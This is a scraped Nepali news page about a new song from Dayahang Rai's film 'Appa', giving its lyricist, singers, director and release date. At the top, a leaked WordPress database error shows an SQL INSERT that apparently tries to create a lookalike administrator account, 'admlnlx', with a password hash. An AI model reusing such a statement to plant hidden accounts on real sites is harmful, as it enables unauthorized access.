WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqHX5ztYrfYzeX/nwkvAolzp5FLlCz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:19:04', '', 'admlnlx', 'admlnlx')

दयाहाङ राईको फिल्म ‘आप्पा’ को नया गीत सार्बजनिक (भिडियो) – Gaule Khabar

दयाहाङ राईको फिल्म ‘आप्पा’ को नया गीत सार्बजनिक (भिडियो)

दयाहाङ राईको फिल्म ‘आप्पा’ को नया गीत सार्बजनिक (भिडियो)

गाउले न्युज, काठमाडौँ-९ पौष । चर्चित अभिनेता दयाहाङ राई अभिनित फिल्म ‘आप्पा’को गीत सार्वजनिक भएको छ । यस फिल्म को हावा सररु बोलको गीत सोमबार सार्वजनिक गरिएको छ । शब्द उमेश उपमाले लेखेका हुन्, थुप्देन भुटिया र स्नेहश्री थापाको स्वर रहेको छ ।

उक्त्त गीतमा सङ्गीत अनमोल गुरुङको सुन्न सकिनेछ । चलचित्रलाई अनमोल गुरुङले निर्देशन गर्दैछन् । जेठ २४ मा रिलिज हुने चलचित्र ‘आप्पा’मा सिद्धान्तराज तामाङ, अल्लोना काबो, तुलसी घिमिरे, अरुणा कार्की लगायतका कलाकारले पनि अभिनय रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका